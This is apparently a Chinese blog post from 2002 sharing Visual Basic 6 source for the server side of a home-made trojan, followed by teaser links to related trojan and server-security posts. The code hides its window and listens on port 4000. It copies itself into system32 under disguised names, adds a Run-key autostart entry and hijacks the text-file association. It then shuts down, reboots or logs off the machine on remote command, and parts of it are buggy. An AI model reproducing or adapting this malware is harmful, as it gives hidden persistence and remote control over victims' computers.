我的小木马---server端---第一次编译

原创 2002年12月20日 09:22:00

'主窗体:Frm_Winsock
'Winsock控件:G_Server

Private Sub Form_Load()
    '隐藏进程
    '
    '读取主机IP
    HostIP = G_Server.LocalIP
    '读取主机名
    HostName = G_Server.LocalHostName
    With Me
    '设置本地默认端口
        .G_Server.LocalPort = 4000
    '监听
        .G_Server.Listen
    '隐藏窗体
        .Hide
    End With

   
    '获取木马所在目录
    Dim sCurrentPath As String
    sCurrentPath = App.Path & "/" & App.EXEName & ".exe"
    Debug.Print sCurrentPath
   
    Dim sSystemDir As String
    sSystemDir = "C:/winnt/system32"
    On Error Resume Next
   
    '复制文件成系统目录下的Systrsy.exe
    FileCopy sCurrentPath, sSystemDir & "/Systrsy.exe"
    On Error Resume Next
   
    '复制文件成系统目录下的txtView.exe
    FileCopy sCurrentPath, sSystemDir & "/txtView.exe"

    '调用
    Call StartupGroup
    Call WriteToTxt

    '判断程序是否下在运行
    If App.PrevInstance Then
        '如果已经运行就退出。
        End
    End If
End Sub

Private Sub G_Server_ConnectionRequest(ByVal requestID As Long)
    With Me
        If .G_Server.State <> sckClosed Then G_Server.Close
        .G_Server.Accept requestID
    End With
End Sub

Private Sub G_Server_DataArrival(ByVal bytesTotal As Long)
    Dim strData As String
    With Me
        ' 接收客户请求的信息
        .G_Server.GetData strData
        Select Case strData
            Case "Exit"
           '关机
                Call ExitWindowsEx(EWX_SHUTDOWN, 0)
            Case "Reboot"
           '重启
                Call ExitWindowsEx(EWX_REBOOT, 0)
            Case "Logoff"
           '注销
                Call ExitWindowsEx(EWX_LOGOFF, 0)
        End Select
    End With
End Sub

'modApi模块

'声明全局变量
Public HostIP As Variant
Public HostName As Variant
'声明API函数
Public Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, _
                                                    ByVal dwReserved As Long) _
                                                    As Long
Public Const EWX_LOGOFF = 0
Public Const EWX_REBOOT = 2
Public Const EWX_SHUTDOWN = 1
Public Declare Function ClipCursor Lib "user32" (lpRect As Any) As Long
Public Type RECT
    Left As Long
    Top As Long
    Right As Long
    Bottom As Long
End Type
Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, _
                                                                           ByVal lpSubKey As String, _
                                                                           phkResult As Long) _
                                                                           As Long
Public Declare Function RegSetvalueEx Lib "advapi32.dll" Alias "RegSetvalueExA" (ByVal hKey As Long, _
                                                                                 ByVal lpvalueName As String, _
                                                                                 ByVal Reserved As Long, _
                                                                                 ByVal dwType As Long, _
                                                                                 lpData As Any, _
                                                                                 ByVal cbData As Long) _
                                                                                 As Long
Public Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, _
                                                                               ByVal lpSubKey As String, _
                                                                               phkResult As Long) _
                                                                               As Long
Public Const REG_BINARY = 3
Public Const REG_SZ = 1
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const HKEY_CLASSES_ROOT = &H80000000

Declare Sub keybd_event Lib "user32" (ByVal bVk As Byte, _
                                      ByVal bScan As Byte, _
                                      ByVal dwFlags As Long, _
                                      ByVal dwExtraInfo As Long)

'写到注册表启动组中的过程
Public Sub StartupGroup()
    Dim skey As String
    Dim result As Long
    Dim hKeyID As Long
    Dim skeyVal As String
    '启动组中的键,找一个与系统文件相近的。
    skey = "Systrsy"
    '木马文件的路径,可以用GetSystemDirectory来取得系统路径。
    skeyVal = "C:/winnt/system32/systrsy.exe"
    result = RegOpenKey(HKEY_LOCAL_MACHINE, "Software/Microsoft/Windows/CurrentVersion/Run", hKeyID)
    If result = 0 Then
        Debug.Print hKeyID & "/n"
        result = RegSetvalueEx(hKeyID, skey, 0&, REG_SZ, skeyVal, Len(skey) + 1)
        Debug.Print result & "/n"
    End If
End Sub

'与txt文件进行关联
Public Sub WriteToTxt()
    Dim result As Long
    Dim hKeyID As Long
    Dim skey As String
    Dim skeyVal As String
    skey = "txtfile/shell/open/command"
    skeyVal = "C:/windows/system/txtView.exe"
    result = RegOpenKey(HKEY_CLASSES_ROOT, skeyVal, hKeyID)
    If result = 0 Then
        Debug.Print hKeyID & "/n"
        result = RegSetvalueEx(hKeyID, skey, 0&, REG_SZ, skeyVal, Len(skeyVal) + 1)
        Debug.Print result
    End If

End Sub

 

Python自制键盘记录木马!

声明 我开发这个程序只有一个目的:学习。绝不会用于其他用途!我发布这个程序也只有一个目的:分享学习经验。鉴于其并没有任何反查杀功能,危害较小,故公开源码,以供新手学习之用。...
  • u012216571
  • u012216571
  • 2015年03月09日 21:45
  • 3470

图解冰河木马一次使用过程

首先搜索 冰河木马 ,然后下载;一下载好,360即报木马; 因为目前是我们准备尝试一下干坏事,恢复之;信任之; 解压之后又报病毒; 恢复; 看下,一个客户端;一个服务端; 先走客户...
  • bcbobo21cn
  • bcbobo21cn
  • 2016年07月10日 23:13
  • 8837

利用msfvenom生成木马程序

一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制. 二,工具:MSF 三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,...
  • gyy823
  • gyy823
  • 2016年08月24日 16:07
  • 5017

SQL SERVER 2000 自动下载木马病毒 cmd.exe和ftp.exe解决办法

SQL SERVER 2000 自动下载木马病毒 cmd.exe和ftp.exe解决办法 来源: 本人在Windows 2003和windows 7 下安装SQL SERVER 2000...
  • chelen_jak
  • chelen_jak
  • 2011年11月04日 16:05
  • 5295

分享Windows Server2003 防木马权限设置IIS服务器安全配置整理 002

参考了网络上很多关于WIN2003的安全设置以及自己动手做了一些实践,综合了这些安全设置文章整理而成,希望对大家有所帮助,另外里面有不足之处还请大家多多指点,然后给补上,谢谢! 一、系统的安装 ...
  • hamigua200224
  • hamigua200224
  • 2012年04月01日 10:25
  • 1110

分享Windows Server2003 防木马权限设置IIS服务器安全配置整理

参考了网络上很多关于WIN2003的安全设置以及自己动手做了一些实践,综合了这些安全设置文章整理而成,希望对大家有所帮助,另外里面有不足之处还请大家多多指点,然后给补上,谢谢! 一、系统的安装 ...
  • hamigua200224
  • hamigua200224
  • 2012年04月01日 10:21
  • 1171

记一次Windows Server 2008 服务器被植入挖矿木马处理

记一次Windows Server 2008 服务器被植入挖矿木马处理 s.exe lsass.exe wininit.exe svchost.exe...
  • hjd199464
  • hjd199464
  • 2018年01月14日 01:41
  • 68

(转)Windows Server2003 防木马权限设置IIS服务器安全配置整理

信息来源:落伍者论坛参考了网络上很多关于WIN2003的安全设置以及自己动手做了一些实践,综合了这些安全设置文章整理而成,希望对大家有所帮助,另外里面有不足之处还请大家多多指点,然后给补上,谢谢!一、...
  • jackyrongvip
  • jackyrongvip
  • 2013年07月01日 17:10
  • 554

关于ArcGIS Server 10 空闲一段时间后第一次访问Crash的原因猜测和解决办法

关于ArcGIS Server 10 空闲一段时间后第一次访问Crash的原因猜测和解决办法 近期在使用ArcGIS Server 10的动态地图服务,遇到一个诡异问题:每隔一段...
  • zhaojian1988
  • zhaojian1988
  • 2015年04月17日 15:33
  • 444

java 木马开发(4)---服务端 ---接收指令函数takeOrder()

本函数是核心函数,用来接收控制端自定义的命令,如果不符合自定义命令,则windows将会调用被控制端cmd,linux调用被控制端shell //不断的循环接收控制端传来的指令,并根据指令进...
  • zkwniky
  • zkwniky
  • 2017年01月28日 23:01
  • 163
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:我的小木马---server端---第一次编译
举报原因:
原因补充:

(最多只允许输入30个字)